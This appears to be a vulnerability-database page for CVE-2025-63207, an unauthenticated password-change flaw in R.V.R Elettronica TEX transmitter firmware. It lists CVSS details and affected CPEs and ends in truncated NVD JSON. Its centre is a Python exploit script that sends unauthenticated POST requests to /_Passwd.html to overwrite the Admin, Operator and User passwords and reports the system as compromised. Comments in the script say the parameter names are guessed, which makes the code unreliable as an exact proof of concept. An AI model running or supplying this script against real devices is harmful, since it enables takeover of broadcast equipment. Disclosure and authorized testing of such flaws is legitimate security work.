CVE-2025-63207

Description

The R.V.R Elettronica TEX product (firmware TEXL-000400, Web GUI TLAN-000400) is vulnerable to broken access control due to improper authentication checks on the /_Passwd.html endpoint. An attacker can send an unauthenticated POST request to change the Admin, Operator, and User passwords, resulting in complete system compromise.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:rvr:tex30lcd\/s_firmware:texl-000400:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:rvr:tex30lcd\/s:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:rvr:tex50lcd\/s_firmware:texl-000400:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:rvr:tex50lcd\/s:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:rvr:tex100lcd\/s_firmware:texl-000400:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:rvr:tex100lcd\/s:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:rvr:tex150lcd\/s_firmware:texl-000400:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:rvr:tex150lcd\/s:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:rvr:tex300lcd_firmware:texl-000400:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:rvr:tex300lcd:-:*:*:*:*:*:*:* - NOT VULNERABLE

R.V.R Elettronica TEX 固件版本 TEXL-000400

R.V.R Elettronica TEX Web GUI 版本 TLAN-000400

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-63207 PoC - R.V.R Elettronica TEX Password Change Exploit
# Target: R.V.R Elettronica TEX device with firmware TEXL-000400 / Web GUI TLAN-000400
# Vulnerability: Broken Access Control on /_Passwd.html endpoint - No authentication required

def change_password(target_ip, new_password):
    """
    Exploit function to change all user passwords on R.V.R Elettronica TEX
    
    Args:
        target_ip: Target device IP address
        new_password: New password to set for all users (Admin, Operator, User)
    
    Returns:
        bool: True if exploitation successful, False otherwise
    """
    url = f"http://{target_ip}/_Passwd.html"
    
    # Payload to change all user passwords (Admin, Operator, User)
    # The exact parameter names may vary - common patterns shown below
    data = {
        'Admin': new_password,
        'Oper': new_password,
        'User': new_password,
        'submit': 'Apply'  # or 'Save' or 'Change'
    }
    
    try:
        # Send unauthenticated POST request to change passwords
        response = requests.post(url, data=data, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Password change request sent successfully")
            print(f"[+] Target: {target_ip}")
            print(f"[+] New password set for all users: {new_password}")
            return True
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection failed: {e}")
        return False

def verify_access(target_ip, username, password):
    """
    Verify if the new credentials work
    """
    url = f"http://{target_ip}/login.html"  # or appropriate login endpoint
    data = {'username': username, 'password': password}
    
    try:
        response = requests.post(url, data=data, timeout=10)
        return response.status_code == 200
    except:
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve_2025_63207.py <target_ip> <new_password>")
        print("Example: python cve_2025_63207.py 192.168.1.100 Admin@123")
        sys.exit(1)
    
    target = sys.argv[1]
    new_pass = sys.argv[2]
    
    print("=" * 60)
    print("CVE-2025-63207 Exploit - R.V.R Elettronica TEX")
    print("Broken Access Control - Unauthenticated Password Modification")
    print("=" * 60)
    
    if change_password(target, new_pass):
        print("\n[!] Exploitation successful - System compromised")
        print("[!] You can now login with any user account using the new password")
    else:
        print("\n[-] Exploitation failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63207
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63207
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63207/
[4] VulDB https://vuldb.com/cve/CVE-2025-63207
[5] https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63207_RVR%20Elettronica%20TEX%20Broken%20Access%20Control
[6] https://www.rvr.it/en/
[7] https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63207_RVR%20Elettronica%20TEX%20Broken%20Access%20Control

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63207", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:48.793", "lastModified": "2026-01-15T19:55:05.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The R.V.R Elettronica TEX product (firmware TEXL-000400, Web GUI TLAN-000400) is vulnerable to broken access control due to improper authentication checks on the /_Passwd.html endpoint. An attacker can send an unauthenticated POST request to change the Admin, Operator, and User passwords, resulting in complete system compromise."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rvr:tex30lcd\\/s_firmware:texl-000400:*:*:*:*:*:*:*", "matchCriteriaId": "2DDF5675-06D9-4A01-9490-A9D83F1BA254"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rvr:tex30lcd\\/s:-:*:*:*:*:*:*:*", "matchCriteriaId": "53A05670-711A-4D6F-89BB-8849DE507C76"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rvr:tex50lcd\\/s_firmware:texl-000400:*:*:*:*:*:*:*", "matchCriteriaId": "3CB3442C-B734-4A95-A25D-CF99E07E588B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rvr:tex50lcd\\/s:-:*:*:*:*:*:*:*", "matchCriteriaId": "ACF54374-2D10-44DC-B481-F2449F552BB3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rvr:tex100lcd\\/s_firmware:texl-000400:*:*:*:*:*:*:*", "matchCriteriaId": "B85488D3-A8E1-4175-83F9-CAE585C4DAB6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rvr:tex100lcd\\/s:-:*:*:*:*:*:*:*", "matchCriteriaId": "64F185C9-A27D-4AFC-A54A-1C44802A5A66"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rvr:tex150lcd\\/s_firmware:texl-000400:*:*:*:*:*:*:*", "matchCriteriaId": "5A48CEA2-0AD8-4B71-A97D-08E7D08ED47B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rvr:tex150lcd\\/s:-:*:*:*:*:*:*:*", "matchCriteriaId": "E75BDA11-64D1-4B95-91E6-91AFB96F4645"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rvr:tex300lcd_firmware:texl-000400:*:*:*:*:*:*:*", "matchCriteriaId": "C03FFF4B-9FD0-4B0C-97B3-A3242FEA5997"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rvr:tex300lcd:-:*:*:*:*:*:*:*", "matchCriteriaId": "8DA92AF5-0B36-4302-8883-8BA850A7F14F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rvr:tex502lcd_firmware:texl-000400:*:*:*:*:*:*:*", "matchCriteriaId": "0355114A-0AC4-48F9-B8C8-024F10DF26CD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rvr:tex502lcd:-:*:*:*:*:*:*:*", "matchCriteriaId": "CA1BF06A-C075-4800-8148-98B7893EE420"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rvr:tex702lcd_firmware:texl-000400:*:*:*:*:*:*:*", "matchCriteriaId": "FF2E4711-65E2-4E5A-8289-1C363C1604F9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rvr:tex702lcd:-:*:*:*:*:*:*:*", "matchCriteriaId": "3BC81BA3-7998-40BB-BE4C-3B356B6E24AF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rvr:tex3500lcd_firmware:texl-000400:*:*:*:*:*:*:*", "matchCriteriaId": "62922A5A-4B27-46B6-8BAE-8C2C2EE6874A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rvr:tex3500lcd:-:*:*:*:*:*:*:*", "matchCriteriaId": "FE5ADADE-4D33-40D0-ACAC-B67E444E82E2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rvr:tex1002lcd_firmware:texl-000400:*:*:*:*:*:*:*", "matchCriteriaId": "D62504CB-796F-4B47-BB9C-39C349C28A9A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "cri ... (truncated)